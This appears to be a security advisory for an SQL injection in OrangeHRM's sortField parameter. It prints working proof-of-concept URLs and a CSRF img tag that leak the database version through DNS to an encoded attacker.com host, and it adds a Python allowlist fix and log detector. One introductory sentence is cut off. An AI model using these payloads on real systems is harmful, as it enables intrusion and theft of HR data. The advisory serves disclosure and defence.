CVSS2 base score: 6 (Medium), vector AV:N/AC:M/Au:S/C:P/I:P/A:P

| CVSS2 metric | Value |
|---|---|
| Access Vector | NETWORK |
| Access Complexity | MEDIUM |
| Authentication | SINGLE |
| Confidentiality Impact | PARTIAL |
| Integrity Impact | PARTIAL |
| Availability Impact | PARTIAL |

EPSS score: 0.001 (Low), percentile 38.9%
High-Tech Bridge Security Research Lab discovered an SQL injection vulnerability in OrangeHRM, which could be exploited to alter SQL requests to the application's database.
version() (or any other sensitive information from the database) subdomain of ".attacker.com" (a domain name whose DNS server is controlled by the attacker):
1.1 http://[host]/symfony/web/index.php/admin/viewCustomers?sortOrder=ASC&sortField=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))
The following PoC demonstrates exploitation of the vulnerability via a CSRF vector:
<img src="http://[host]/symfony/web/index.php/admin/viewCustomers?sortOrder=ASC&sortField=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))">
1.2 http://[host]/symfony/web/index.php/admin/viewPayGrades?sortOrder=ASC&sortField=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))
1.3 http://[host]/symfony/web/index.php/admin/viewSystemUsers?sortOrder=ASC&sortField=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114))))
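All three PoCs above share one root cause: the sortField and sortOrder request parameters are copied into an ORDER BY clause. ORDER BY targets cannot be bound as prepared-statement parameters, so the fix is an allowlist that maps request values onto known column names and never lets the raw string reach SQL text. The example below is an added illustration, not OrangeHRM's code (which is PHP); it is written in Python against an in-memory SQLite table with assumed column names (name, description), and the access log lines it scans are constructed for the example. The same allowlist doubles as a detection check over web server logs, flagging any request whose sortField is not a known column.

```python
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Allowlist of sortable columns for a hypothetical customer list view.
# Keys are the values accepted from the request; values are the real column
# names (assumed here, not OrangeHRM's schema) that end up in ORDER BY.
SORTABLE_COLUMNS = {"name": "name", "description": "description"}
SORT_ORDERS = {"ASC": "ASC", "DESC": "DESC"}


def sort_field_is_allowed(value):
    """True only for values that map onto an allowlisted column."""
    return value in SORTABLE_COLUMNS


def build_customer_query(sort_field, sort_order):
    """Build the ORDER BY query from allowlisted names only.

    The request value is used as a dictionary key and is never copied into
    the SQL string, so anything outside the allowlist (for example a
    parenthesised subselect) is rejected before a query exists.
    """
    column = SORTABLE_COLUMNS.get(sort_field)
    if column is None:
        raise ValueError(f"unsupported sortField: {sort_field!r}")
    order = SORT_ORDERS.get(sort_order.upper())
    if order is None:
        raise ValueError(f"unsupported sortOrder: {sort_order!r}")
    return f"SELECT id, name FROM customers ORDER BY {column} {order}"


def list_customers(conn, sort_field, sort_order):
    """Run the allowlisted query and return customer names in sorted order."""
    query = build_customer_query(sort_field, sort_order)
    return [row[1] for row in conn.execute(query)]


def make_demo_db():
    """Constructed in-memory table so the example runs offline."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE customers (id INTEGER PRIMARY KEY, name TEXT, description TEXT)"
    )
    conn.executemany(
        "INSERT INTO customers (name, description) VALUES (?, ?)",
        [("Zeta Corp", "c"), ("Acme Ltd", "a"), ("Mid Inc", "b")],
    )
    return conn


def suspicious_sort_requests(log_lines):
    """Return (line_no, sortField value) pairs whose sortField fails the allowlist.

    Sweeps common-log-format lines for the request shape in the advisory:
    a sortField that is anything other than a known column name.
    """
    hits = []
    for line_no, line in enumerate(log_lines, start=1):
        # The request target is the second token inside the first quoted
        # field: "GET /path?query HTTP/1.1".
        try:
            target = line.split('"')[1].split(" ")[1]
        except IndexError:
            continue
        params = parse_qs(urlsplit(target).query)
        for value in params.get("sortField", []):
            if not sort_field_is_allowed(value):
                hits.append((line_no, value))
    return hits


# Constructed sample access log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2014:10:00:00 +0000] "GET /symfony/web/index.php/admin/viewCustomers?sortOrder=ASC&sortField=name HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2014:10:00:07 +0000] "GET /symfony/web/index.php/admin/viewCustomers?sortOrder=ASC&sortField=(select%20version()) HTTP/1.1" 200 498',
]

if __name__ == "__main__":
    db = make_demo_db()
    print(list_customers(db, "name", "ASC"))
    print(suspicious_sort_requests(SAMPLE_LOG))
```

The allowlist approach generalises to every view listed in the PoCs (viewCustomers, viewPayGrades, viewSystemUsers): each view gets its own mapping of permitted sort keys, and the shared builder refuses anything else. Escaping or quoting the value is not a substitute, because ORDER BY expects an identifier or expression, not a string literal.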
| CPE | Name | Operator | Version |
|---|---|---|---|
| | orangehrm | le | 2.7.1-rc.1 |